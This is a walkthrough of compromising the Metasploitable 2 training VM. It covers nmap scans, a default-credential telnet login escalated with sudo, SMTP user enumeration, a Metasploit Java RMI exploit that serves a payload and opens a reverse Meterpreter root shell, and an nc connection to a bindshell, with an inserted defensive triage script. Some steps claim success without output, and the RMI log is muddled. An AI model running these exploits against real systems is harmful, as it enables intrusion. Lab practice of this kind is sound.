Metasploitable: 2 – Walkthrough

Metasploitable 2 is a nice challenge for testing many vulnerabilities with the Metasploit tool. It offers really simple and nice tricks to get root on a deliberately vulnerable version of a system.
Let's get started.

┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:33 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0014s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.72
Host is up (0.0017s latency).
MAC Address: CC:AF:78:50:24:00 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.73
Host is up (0.00027s latency).
MAC Address: 00:0C:29:C7:95:E6 (VMware)
Nmap scan report for 192.168.1.100
Host is up (0.00013s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.49 seconds

I start with an Nmap ping sweep to find the target VM's IP. The VMware guest is running on 192.168.1.73. Nmap again to find the open ports.

┌─[[email protected]]─[~]
└──> nmap -sV -p- 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:36 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.0016s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
51268/tcp open  rmiregistry GNU Classpath grmiregistry
51834/tcp open  mountd      1-3 (RPC #100005)
53124/tcp open  status      1 (RPC #100024)
60448/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:C7:95:E6 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.90 seconds
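As a defensive counterpart to this scan (an added example, not part of the walkthrough), here is a small Python triage script that parses `nmap -sV` service lines in the format shown above and flags the exposures this box demonstrates; the sample rows, rule set and severity labels are constructed for the example.

```python
import re

# Constructed sample in the format of `nmap -sV` output (a subset of the
# scan above, not the full table).
SAMPLE_NMAP = """\
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
512/tcp   open  exec        netkit-rsh rexecd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
"""

# PORT/PROTO  STATE  SERVICE  VERSION (version is optional and free-form)
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return one dict per service row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return rows

# Triage rules (constructed): predicate on a row, severity, remediation note.
RULES = [
    (lambda r: r["service"] == "ftp" and r["version"].startswith("vsftpd 2.3.4"),
     "critical", "vsftpd 2.3.4 is a known backdoored release: upgrade or remove"),
    (lambda r: r["port"] in (23, 512, 513, 514),
     "high", "cleartext telnet/r-services: disable and use SSH only"),
    (lambda r: r["port"] == 1524,
     "critical", "unauthenticated shell listener: remove the service"),
    (lambda r: r["service"] == "rmiregistry",
     "high", "Java RMI registry exposed (remote class loading): firewall it"),
]

def assess(rows):
    """Return (port, severity, message) for every open row that trips a rule."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        for pred, sev, msg in RULES:
            if pred(r):
                findings.append((r["port"], sev, msg))
    return findings

if __name__ == "__main__":
    for port, sev, msg in assess(parse_nmap(SAMPLE_NMAP)):
        print(f"{port:>5}  {sev:<8}  {msg}")
```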

Awesome, there are many services running, so there are probably many vulnerabilities. Let's exploit from top to bottom.

First, the vsftpd version is 2.3.4. I google the version number to find out whether it is exploitable.

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

Yes. It can be exploited with Metasploit. Let's try.


Owned! Next.

OpenSSH 4.7p1 is also vulnerable.

https://charlesreid1.com/wiki/Metasploitable/SSH/Exploits


Got root? Done. Next.

Telnet is also vulnerable: the login banner itself describes how to get in.

┌─[[email protected]]─[~]
└──> telnet 192.168.1.73
Trying 192.168.1.73...
Connected to 192.168.1.73.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: msfadmin
Password: 
Last login: Tue Jan  9 05:44:13 EST 2018 from 192.168.1.101 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: 
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#

Next, SMTP user enumeration. The gld_postfix exploit module fails (nothing listens on 2525), so I switch to the smtp_enum scanner instead.

msf > use exploit/linux/misc/gld_postfix
msf exploit(linux/misc/gld_postfix) > show options

Module options (exploit/linux/misc/gld_postfix):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  2525             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   RedHat Linux 7.0 (Guinness)


msf exploit(linux/misc/gld_postfix) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(linux/misc/gld_postfix) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[-] 192.168.1.73:2525 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.73:2525).
[*] Exploit completed, but no session was created.
msf exploit(linux/misc/gld_postfix) > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.1.73
RHOSTS => 192.168.1.73
msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.1.73:25       - 192.168.1.73:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.73:25       - 192.168.1.73:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Next, Samba smbd 3.X. It can be exploited, but I don't show it in this walkthrough because I already wrote it up in the last one.

Next, GNU Classpath (the Java RMI registry on port 1099). 😉

msf auxiliary(scanner/smtp/smtp_enum) > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/wKNQ8aS6geYU
[*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/wKNQ8aS6geYU
[*] 192.168.1.73:1099 - Server started.
[*] 192.168.1.73:1099 - Sending RMI Header...
[*] 192.168.1.73:1099 - Sending RMI Call...
[*] 192.168.1.73:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.1.73
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.73:36318) at 2018-01-09 18:53:38 +0630
id
[-] 192.168.1.73:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.1.73:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/iSyb4JDXRzhA5h
[*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/iSyb4JDXRzhA5h
[*] 192.168.1.73:1099 - Server started.
[*] 192.168.1.73:1099 - Sending RMI Header...
[*] 192.168.1.73:1099 - Sending RMI Call...
[*] 192.168.1.73:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.1.73
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.73:33132) at 2018-01-09 18:53:58 +0630
^C[-] 192.168.1.73:1099 - Exploit failed: Interrupt 
[*] 192.168.1.73:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Got root! Next, the shell connection on port 1524.

┌─[[email protected]]─[~]
└──> nc 192.168.1.73 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/# 

Woot! Thanks for reading. Happy hacking.

PS – There are many exploit methods. Good luck.